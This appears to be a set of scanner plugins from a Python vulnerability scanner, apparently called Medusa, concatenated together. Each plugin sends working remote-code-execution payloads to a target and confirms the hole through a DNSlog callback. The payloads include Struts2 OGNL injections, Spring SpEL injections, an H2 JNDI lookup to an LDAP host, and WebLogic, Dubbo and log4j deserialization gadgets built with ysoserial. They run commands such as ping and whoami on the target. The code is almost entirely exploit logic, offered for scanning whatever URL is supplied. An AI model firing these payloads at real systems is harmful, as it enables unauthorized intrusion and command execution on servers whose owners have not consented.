def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: DL = Dnslog() payload = "/oauth/authorize?client_id=client&response_type=code&redirect_uri=http://www.github.com&scope=%24%7BT%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22ping%20{}%22%29%7D".format( DL.dns_host()) payload_url = scheme + "://" + url + ":" + str(port) + payload resp = requests.get(payload_url, headers=Headers, proxies=proxies, timeout=6, verify=False) time.sleep(4) if DL.result(): Medusa = "{}存在SpringSecurityOauth2远程代码执行漏洞(CVE-2018-1260)\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format( url, resp.text, DL.dns_host(), str(DL.dns_text())) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(**kwargs) -> None: Url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: DL = Dnslog() JrmpPort = "2000" #端口随便 JrmpClient = "JRMPClient" YsoserialPath = GetToolFilePath().Result() + "ysoserial.jar" TempPath = GetTempFilePath().Result() + str(int( time.time())) + "_" + randoms().result(10) con, payload = exploit(url, port, YsoserialPath, DL.dns_host(), JrmpPort, JrmpClient, TempPath) time.sleep(5) if DL.result(): Medusa = "{}存在WeblogicWLS核心组件反序列化命令执行漏洞(CVE-2018-2628)\r\n验证数据:\r\n使用POC:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\nDNSlog返回结果:{}\r\n".format( url, payload, con, DL.dns_host(), DL.dns_text()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, "", **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: dns = Dnslog() YsoserialPath = GetToolFilePath().Result() + "ysoserial.jar" subprocess.Popen([ "java", "-jar", YsoserialPath, "CommonsCollections5", "ping " + dns.dns_host() ], stdout=subprocess.PIPE) time.sleep(5) if dns.result(): Medusa = "{}存在log4j远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\nDNSlog请求值{}\r\nDNSlog数据{}\r\n".format( url, scheme + "://" + url + ":" + str(port), dns.dns_host(), dns.dns_text()) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(**kwargs) -> None: url = kwargs.get("Url") #获取传入的url参数 Headers = kwargs.get("Headers") #获取传入的头文件 proxies = kwargs.get("Proxies") #获取传入的代理参数 try: dns = Dnslog() YsoserialPath = GetToolFilePath().Result() + "ysoserial.jar" subprocess.Popen([ "java", "-jar", YsoserialPath, "CommonsCollections5", "ping " + dns.dns_host() ], stdout=subprocess.PIPE) time.sleep(5) if dns.result(): Medusa = "{}存在log4j远程命令执行漏洞(CVE-2019-17571)\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\nDNSlog请求值{}\r\nDNSlog数据{}\r\n".format( url, url, dns.dns_host(), dns.dns_text()) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, "", **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(**kwargs) -> None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 DL = Dnslog() payload = """?age=medusa&name=%28%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3D+new+java.lang.Boolean%28true%29,%[email protected]@getRuntime%28%29.exec%28%27ping%20{}%27%29%29%28meh%29&z%5B%28name%29%28%27meh%27%29%5D=true""".format( DL.dns_host()) try: payload_url = url + payload resp = requests.get(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False) con = resp.text time.sleep(3) if DL.result(): Medusa = "{} 存在Struts2远程代码执行漏洞(S2-009)\r\n漏洞详情:\r\n版本号:S2-009\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format( url, payload_url, con, DL.dns_text(), DL.dns_host()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/h2-console/login.do?jsessionid=" payload_url = scheme + "://" + url + ":" + str( port) + payload + "ad3ae393781ccf8d7abf0345aa88e398" jsession = requests.get( payload_url, timeout=5, proxies=proxies, verify=False, headers=Headers, ) global pgroups preg = re.compile(r"login\.jsp\?jsessionid=(.*?)'", re.S) pgroups = re.findall(preg, jsession.text) if not pgroups: preg = re.compile(r"admin\.do\?jsessionid=(.*?)\"", re.S) pgroups = re.findall(preg, jsession.text) payload_url2 = scheme + "://" + url + ":" + str( port) + payload + pgroups[0] Headers2 = Headers Headers2['Content-Type'] = 'application/x-www-form-urlencoded' Headers2['Referer'] = payload_url2 DL = Dnslog() data = "language=en&setting=Generic+JNDI+Data+Source&name=Generic+JNDI+Data+Source&driver=javax.naming.InitialContext&url=ldap%3A%2F%2F{}%2FExploit&user=&password="******"{}存在SpringBootH2数据库JNDI注入漏洞\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format( url, resp.text, DL.dns_host(), str(DL.dns_text())) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port, path = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port DL = Dnslog() con = "" data = b"""-----------------------------735323031399963166993862150 Content-Disposition: form-data; name="foo"; filename="%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\x00" Content-Type: text/plain x -----------------------------735323031399963166993862150-- """ try: payload_url = scheme + "://" + url + ":" + str(port) + path Headers["Content-Length"] = "10000000" Headers[ "Content-Type"] = "multipart/form-data; boundary=---------------------------735323031399963166993862150" try: #防止在linux系统上执行了POC,导致超时扫描不到漏洞 resp = requests.post(payload_url, headers=Headers, data=data, timeout=6, proxies=proxies, verify=False) con = resp.text except Exception as e: pass time.sleep(2) if DL.result(): Medusa = "{} 存在Struts2远程代码执行漏洞(S2-046)\r\n漏洞详情:\r\n版本号:S2-046\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format( url, data, con, DL.dns_text(), DL.dns_host()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port, path = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port DL = Dnslog() con = "" payload1 = '%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27' + "ping%20" + DL.dns_host( ) + '%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/' payload2 = "%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27" + "ping%20" + DL.dns_host( ) + "%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/" for payload in [payload1, payload2]: try: path1 = os.path.split(path)[0] path2 = os.path.split(path)[1] payload_url = scheme + "://" + url + ":" + str( port) + path1 + "/" + payload + path2 headers = { 'User-Agent': RandomAgent, "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } try: # 防止在linux系统上执行了POC,导致超时扫描不到漏洞 resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False, allow_redirects=False) con = resp.text except: pass if DL.result(): Medusa = "{} 存在Struts2远程代码执行漏洞(S2-057)\r\n漏洞详情:\r\n版本号:S2-057\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format( url, payload_url, con, DL.dns_text(), DL.dns_host()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) # 调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port, path = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port DL = Dnslog() con = "" payload = """%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27ping%20{}%27%29.getInputStream%28%29%29%2C%23q%7D.action""".format( DL.dns_host()) try: payload_url = scheme + "://" + url + ":" + str(port) + path + payload headers = { 'User-Agent': RandomAgent, "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } try: #防止在linux系统上执行了POC,导致超时扫描不到漏洞 resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text except: pass time.sleep(2) if DL.result(): Medusa = "{} 存在Struts2远程代码执行漏洞(S2-015)\r\n漏洞详情:\r\n版本号:S2-015\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format( url, payload_url, con, DL.dns_text(), DL.dns_host()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port, path = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port DL = Dnslog() con = "" payload = """?redirect:%24%7B%23a%3D%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%27ping%27%2c%27{}%27%7D%29%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B500%5D%2C%23d.read%28%23e%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D""".format( DL.dns_host()) try: payload_url = scheme + "://" + url + ":" + str(port) + path + payload headers = { 'User-Agent': RandomAgent, "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } try: #防止在linux系统上执行了POC,导致超时扫描不到漏洞 resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text except: pass time.sleep(2) if DL.result(): Medusa = "{} 存在Struts2远程代码执行漏洞(S2-016)\r\n漏洞详情:\r\n版本号:S2-016\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format( url, payload_url, con, DL.dns_text(), DL.dns_host()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: DL = Dnslog() data = """username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping+%s")]=xxx""" % DL.dns_host( ) payload = "/users?page=&size=5" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Referer": payload_url } resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False) time.sleep(4) if DL.result(): Medusa = "{}存在SpringDataCommons远程命令执行漏洞\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format( url, resp.text, DL.dns_host(), str(DL.dns_text())) print(Medusa) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(**kwargs) -> None: Url = kwargs.get("Url") #获取传入的url参数 scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: DL = Dnslog() client = DubboClient(url, int(port)) JdbcRowSetImpl = new_object('com.sun.rowset.JdbcRowSetImpl', dataSource="ldap://" + DL.dns_host(), strMatchColumns=["foo"]) JdbcRowSetImplClass = new_object( 'java.lang.Class', name="com.sun.rowset.JdbcRowSetImpl", ) toStringBean = new_object('com.rometools.rome.feed.impl.ToStringBean', beanClass=JdbcRowSetImplClass, obj=JdbcRowSetImpl) resp = client.send_request_and_return_response( service_name= 'org.apache.dubbo.spring.boot.sample.consumer.DemoService', # 此处可以是 $invoke、$invokeSync、$echo 等,通杀 2.7.7 及 CVE 公布的所有版本。 method_name='$invoke', args=[toStringBean]) time.sleep(3) if DL.result(): Medusa = "{} 存在Dubbo反序列化漏洞(CVE-2020-1948)\r\n验证数据:\r\n返回DNSLOG:{}\r\n使用DNSLOG数据:{}\r\n返回数据包:{}\r\n".format( url, DL.dns_text(), DL.dns_host(), str(resp)) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, "", **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port, path = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port DL = Dnslog() payload = """?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%[email protected]@getRuntime%28%29.exec%28%22ping%20{}%22%29)""".format( DL.dns_host()) try: payload_url = scheme + "://" + url + ":" + str(port) + path + payload headers = { 'User-Agent': RandomAgent, "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text time.sleep(3) if DL.result(): Medusa = "{} 存在Struts2远程代码执行漏洞(S2-008)\r\n漏洞详情:\r\n版本号:S2-008\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format( url, payload_url, con, DL.dns_text(), DL.dns_host()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None: if proxies != None: proxies_scheme, proxies_url, proxies_port = UrlProcessing().result( proxies) socks.set_default_proxy(socks.HTTP, addr=proxies_url, port=proxies_port) # 设置socks代理 socket.socket = socks.socksocket # 把代理应用到socket scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: DL = Dnslog() JrmpPort = "2000" #端口随便 JrmpClient = "JRMPClient" YsoserialPath = GetToolFilePath().Result() + "ysoserial.jar" TempPath = GetTempFilePath().Result() + str(int( time.time())) + "_" + randoms().result(10) con, payload = exploit(url, port, YsoserialPath, DL.dns_host(), JrmpPort, JrmpClient, TempPath) time.sleep(5) if DL.result(): Medusa = "{}存在WeblogicWLS核心组件反序列化命令执行漏洞(CVE-2018-2628)\r\n验证数据:\r\n使用POC:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\nDNSlog返回结果:{}\r\n".format( url, payload, con, DL.dns_host(), DL.dns_text()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) # 调用写入类传入URL和错误插件名
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: headers = { 'User-Agent': RandomAgent, "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } DL = Dnslog() payload = "/oauth/authorize?client_id=client&response_type=code&redirect_uri=http://www.github.com&scope=%24%7BT%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22ping%20{}%22%29%7D".format( DL.dns_host()) payload_url = scheme + "://" + url + ":" + str(port) + payload resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=6, verify=False) time.sleep(4) if DL.result(): Medusa = "{}存在SpringSecurityOauth2远程代码执行漏洞\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format( url, resp.text, DL.dns_host(), str(DL.dns_text())) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(**kwargs) -> None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 DL = Dnslog() con = "" global resp try: payload_url = url Headers[ "Content-Type"] = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ping " + DL.dns_host( ) + "').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" try: #防止在linux系统上执行了POC,导致超时扫描不到漏洞 resp = requests.post(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False) con = resp.text except: pass time.sleep(2) if DL.result(): Medusa = "{} 存在Struts2远程代码执行漏洞(S2-045)\r\n漏洞详情:\r\n版本号:S2-045\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format( url, resp.request.headers, con, DL.dns_text(), DL.dns_host()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(**kwargs)->None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: DL=Dnslog() data="""username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping+%s")]=xxx"""%DL.dns_host() payload ="/users?page=&size=5" payload_url = url + payload Headers["Content-Type"]="application/x-www-form-urlencoded" Headers["Referer"]=payload_url resp = requests.post(payload_url,data=data, headers=Headers, proxies=proxies, timeout=6, verify=False) time.sleep(4) if DL.result(): Medusa = "{}存在SpringDataCommons远程命令执行漏洞(CVE-2018-1273)\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(url,resp.text, DL.dns_host(), str( DL.dns_text())) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url:str,RandomAgent:str,proxies:str=None,**kwargs)->None: proxies=Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: con="" payload = '/org.apache.dubbo.samples.http.api.DemoService' payload_url = scheme + "://" + url + ":" + str(port) + payload DL=Dnslog() JrmpClient = "CommonsCollections4" YsoserialPath=GetToolFilePath().Result()+"ysoserial.jar" TempPath=GetTempFilePath().Result()+str(int(time.time()))+"_"+randoms().result(10) data=generate_payload(YsoserialPath, "ping "+DL.dns_host(), JrmpClient,TempPath) headers = { 'User-Agent': RandomAgent, "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } try: resp = requests.post(payload_url,data=data,headers=headers, proxies=proxies, timeout=6, verify=False) con = resp.text except: pass if DL.result(): Medusa = "{} 存在Dubbo反序列化漏洞(CVE-2019-17564)\r\n验证数据:\r\n返回DNSLOG:{}\r\n使用DNSLOG数据:{}\r\n返回数据包:{}\r\n".format(url,DL.dns_text(),DL.dns_host(),con) print(Medusa) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e) # 调用写入类传入URL和错误插件名
